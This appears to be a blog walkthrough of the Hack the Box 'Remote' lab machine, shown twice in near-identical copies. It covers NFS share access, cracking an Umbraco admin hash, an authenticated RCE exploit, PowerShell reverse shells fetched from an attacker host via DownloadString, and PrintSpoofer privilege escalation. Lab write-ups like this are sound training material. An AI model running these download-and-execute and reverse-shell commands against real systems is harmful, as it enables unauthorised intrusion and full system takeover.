Hack the Box - Remote - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Remote machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Remote machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.153
Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
nmap -sV -p21,80,111,135,139,445,2049,5985,47001 -T4 10.129.1.153
Port 2049 is open, which is a NFS service. Let's see if there's an publicly exposed shares:
showmount -e 10.129.1.153
This is a great find. We can mount this directory to our filesystem by creating a new directory, then using the mount command
sudo mkdir /mnt/remote
sudo mount -t nfs 10.129.1.153:/site_backups /mnt/remote -o nolock
Now let's take a look at this website backup:
ls /mnt/remote
It looks like we have Umbraco CMS on this server. We'll do a quick Google search to see where we can find some credentials:
Google search string: umbraco login credentials file
Let's see if there are credentials in there:
strings /mnt/remote/App_Data/Umbraco.sdf | more
We'll try throwing this admin password hash into Crackstation.net:
https://crackstation.net
Let's try logging into the Umbraco CMS on the web-server:
http://10.129.1.153/umbraco
Login with username: admin@htb.local
and password: baconandcheese
We can check Umbraco's version number by clicking the user button at the top-left of the page:
Let's see if there's an exploit for this version on Searchsploit.
searchsploit umbraco 7
This matches our version exactly. Let's check it out:
searchsploit -x 49488
This looks promising. We'll copy it to our working directory and rename it for clarity:
searchsploit -m 49488 && mv 49488.py umbraRCE.py
And now to see if the exploits works:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c ipconfig
Finding a Way In
We have RCE on the webserver, which means we can potentially get a reverse shell via PowerShell. To do so, we need to take the following steps:
1) Download the PowerShell script that we want to have the victim system execute to open our reverse shell.
2) Modify the downloaded PowerShell script so that it matches our attacking system.
3) Host the PowerShell script on a temporary web-server so the victim can download it.
4) Startup a Netcat listener on our attacking system to catch the reverse shell when its sent.
5) Use the Python exploit to have the victim system download our PowerShell script and execute it, opening the reverse shell to our attacking system.
First, we download the PowerShell script we want to use. We'll be using a script from the Nishang GitHub repository, located here:
https://github.com/samratashok/nishang
Specifically, we'll be using this script:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
We download the script to our working directory:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Second, we append the following line to the end of the script so it executes upon import into PowerShell:
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.99.99 -Port 53" >> Invoke-PowerShellTcp.ps1
Now the script will call back to our attacking system when it's imported.
Third, we start the Python SimpleHTTPServer from our working directory so the Invoke-PowerShellTcp.ps1 script can be downloaded:
sudo python -m SimpleHTTPServer 80
Fourth, we start a Netcat listener on our attacking system in order to catch a reverse shell from the victim:
sudo nc -nlvp 53
Lastly, we send the RCE PowerShell command to the victim server using the Python exploit to open our reverse shell:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c powershell.exe -a "-NoProfile -Command iex(New-Object Net.WebClient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')"
Capturing the User Flag
We'll take this opportunity to capture the user flag on the system. HackTheBox Windows systems usually have the user flag placed in a user's \Desktop directory, but in this case, it's in the C:\users\public\ directory:
Privilege Escalation
Examination of our current user account reveals that we have potentially exploitable privileges:
whoami /priv
There are a couple of different exploits we could try if we have SeImpersonatePrivilege on our user account. We'll try the Printspoofer exploit located here:
https://github.com/dievus/printspoofer
We'll need to check the target's Windows version to make sure the exploit will work. We're pretty sure the system is either Windows 10, Server 2016 or Server 2019, since our Nikto scan from way back reported the version of IIS server was 10:
systeminfo
Everything seems to match, so first we'll download the Printspoofer binary to our working directory:
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
Now, on the Windows system, we'll move to a publicly writable directory, then download the Printspoofer executable with Certutil:
cd c:\windows\temp
certutil -urlcache -split -f http://10.10.99.99/PrintSpoofer.exe
Because spawning a new shell inside of a PowerShell session doesn't work well, we won't use PrintSpoofer to spawn a new privileged shell, rather we'll use it to download and execute the Invoke-PowerShellTcp.ps1 script again and open another reverse shell for us, this one with high privilege:
From our attacking machine:
sudo nc -nlvp 53
When our first reverse shell was received by Netcat, a connection was established on a different port, so TCP port 53 became available for use again. Now, from the Windows machine, we run Printspoofer.exe, instructing it to use PowerShell to open our reverse shell:
.\printspoofer.exe -i -c “powershell.exe IEX(New-Object Net.webclient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')”
Capturing the Root Flag
The root flag on Hack the Box Windows systems is usually located in the Administrator user's \Desktop directory:
get-content c:\users\administrator\desktop\root.txt
Summary
After initial scans, we found that there was a publicly accessible network file share on the target system, and after accessing it, we were able to capture credentials for the CMS web-app present on the webserver. That version of CMS installed on the system was vulnerable to a publicly available exploit which provided authenticated remote code execution through the CMS. Through that exploit, we were able to establish a foothold shell on the target system. Enumeration of our captured user account's privileges revealed that it possessed privileges which permitted privilege escalation via a user account impersonation exploit, which we used to gain SYSTEM access and capture our objective flag file.
Finish
Today we're going to be doing a pentest walkthrough of the Remote machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Remote machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.153
Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
nmap -T4 -p- 10.129.1.153
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
nmap -sV -p21,80,111,135,139,445,2049,5985,47001 -T4 10.129.1.153
Port 2049 is open, which is a NFS service. Let's see if there's an publicly exposed shares:
showmount -e 10.129.1.153
This is a great find. We can mount this directory to our filesystem by creating a new directory, then using the mount command
sudo mkdir /mnt/remote
sudo mount -t nfs 10.129.1.153:/site_backups /mnt/remote -o nolock
Now let's take a look at this website backup:
ls /mnt/remote
It looks like we have Umbraco CMS on this server. We'll do a quick Google search to see where we can find some credentials:
Google search string: umbraco login credentials file
Let's see if there are credentials in there:
strings /mnt/remote/App_Data/Umbraco.sdf | more
We'll try throwing this admin password hash into Crackstation.net:
https://crackstation.net
Let's try logging into the Umbraco CMS on the web-server:
http://10.129.1.153/umbraco
Login with username: admin@htb.local
and password: baconandcheese
We can check Umbraco's version number by clicking the user button at the top-left of the page:
Let's see if there's an exploit for this version on Searchsploit.
searchsploit umbraco 7
This matches our version exactly. Let's check it out:
searchsploit -x 49488
This looks promising. We'll copy it to our working directory and rename it for clarity:
searchsploit -m 49488 && mv 49488.py umbraRCE.py
And now to see if the exploits works:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c ipconfig
Finding a Way In
We have RCE on the webserver, which means we can potentially get a reverse shell via PowerShell. To do so, we need to take the following steps:
1) Download the PowerShell script that we want to have the victim system execute to open our reverse shell.
2) Modify the downloaded PowerShell script so that it matches our attacking system.
3) Host the PowerShell script on a temporary web-server so the victim can download it.
4) Startup a Netcat listener on our attacking system to catch the reverse shell when its sent.
5) Use the Python exploit to have the victim system download our PowerShell script and execute it, opening the reverse shell to our attacking system.
First, we download the PowerShell script we want to use. We'll be using a script from the Nishang GitHub repository, located here:
https://github.com/samratashok/nishang
Specifically, we'll be using this script:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
We download the script to our working directory:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Second, we append the following line to the end of the script so it executes upon import into PowerShell:
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.99.99 -Port 53" >> Invoke-PowerShellTcp.ps1
Now the script will call back to our attacking system when it's imported.
Third, we start the Python SimpleHTTPServer from our working directory so the Invoke-PowerShellTcp.ps1 script can be downloaded:
sudo python -m SimpleHTTPServer 80
Fourth, we start a Netcat listener on our attacking system in order to catch a reverse shell from the victim:
sudo nc -nlvp 53
Lastly, we send the RCE PowerShell command to the victim server using the Python exploit to open our reverse shell:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c powershell.exe -a "-NoProfile -Command iex(New-Object Net.WebClient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')"
Capturing the User Flag
We'll take this opportunity to capture the user flag on the system. HackTheBox Windows systems usually have the user flag placed in a user's \Desktop directory, but in this case, it's in the C:\users\public\ directory:
get-content C:\users\public\user.txt
Privilege Escalation
Examination of our current user account reveals that we have potentially exploitable privileges:
whoami /priv
There are a couple of different exploits we could try if we have SeImpersonatePrivilege on our user account. We'll try the Printspoofer exploit located here:
https://github.com/dievus/printspoofer
We'll need to check the target's Windows version to make sure the exploit will work. We're pretty sure the system is either Windows 10, Server 2016 or Server 2019, since our Nikto scan from way back reported the version of IIS server was 10:
systeminfo
Everything seems to match, so first we'll download the Printspoofer binary to our working directory:
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
Now, on the Windows system, we'll move to a publicly writable directory, then download the Printspoofer executable with Certutil:
cd c:\windows\temp
certutil -urlcache -split -f http://10.10.99.99/PrintSpoofer.exe
Because spawning a new shell inside of a PowerShell session doesn't work well, we won't use PrintSpoofer to spawn a new privileged shell, rather we'll use it to download and execute the Invoke-PowerShellTcp.ps1 script again and open another reverse shell for us, this one with high privilege:
From our attacking machine:
sudo nc -nlvp 53
When our first reverse shell was received by Netcat, a connection was established on a different port, so TCP port 53 became available for use again. Now, from the Windows machine, we run Printspoofer.exe, instructing it to use PowerShell to open our reverse shell:
.\printspoofer.exe -i -c “powershell.exe IEX(New-Object Net.webclient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')”
Capturing the Root Flag
The root flag on Hack the Box Windows systems is usually located in the Administrator user's \Desktop directory:
get-content c:\users\administrator\desktop\root.txt
Summary
After initial scans, we found that there was a publicly accessible network file share on the target system, and after accessing it, we were able to capture credentials for the CMS web-app present on the webserver. That version of CMS installed on the system was vulnerable to a publicly available exploit which provided authenticated remote code execution through the CMS. Through that exploit, we were able to establish a foothold shell on the target system. Enumeration of our captured user account's privileges revealed that it possessed privileges which permitted privilege escalation via a user account impersonation exploit, which we used to gain SYSTEM access and capture our objective flag file.
Finish
Comments
Post a Comment